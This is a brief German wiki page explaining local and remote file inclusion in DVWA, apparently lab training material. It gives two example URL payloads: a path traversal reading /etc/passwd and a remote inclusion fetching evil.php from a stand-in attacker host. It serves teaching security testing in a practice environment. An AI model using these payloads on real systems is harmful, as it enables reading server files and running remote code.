DVWA File Inclusion

Aus Xinux Wiki

Version vom 15. Juni 2021, 13:37 Uhr von Tina.messmann (Diskussion | Beiträge)

(Unterschied) ← Nächstältere Version | Aktuelle Version (Unterschied) | Nächstjüngere Version → (Unterschied)

Zur Navigation springen Zur Suche springen

Tritt auf, wenn der Client die Möglichkeit hat, Dateien mitzugeben, die der Server einbindet.

Local File Inclusion

Ausführen einer Datei, die lokal auf dem Server vorliegt.
z.Bsp. Anpassen der URL: ...?page=../../../../../../etc/passwd (oder auch ...?page=/etc/passwd)

Remote File Inclusion

Download und Ausführen einer Datei von extern.
z.Bsp. Anpassen der URL: ...?page=http://www.evilsite.com/evil.php

Abgerufen von „http://wiki.ixheim.de/index.php?title=DVWA_File_Inclusion&oldid=24028“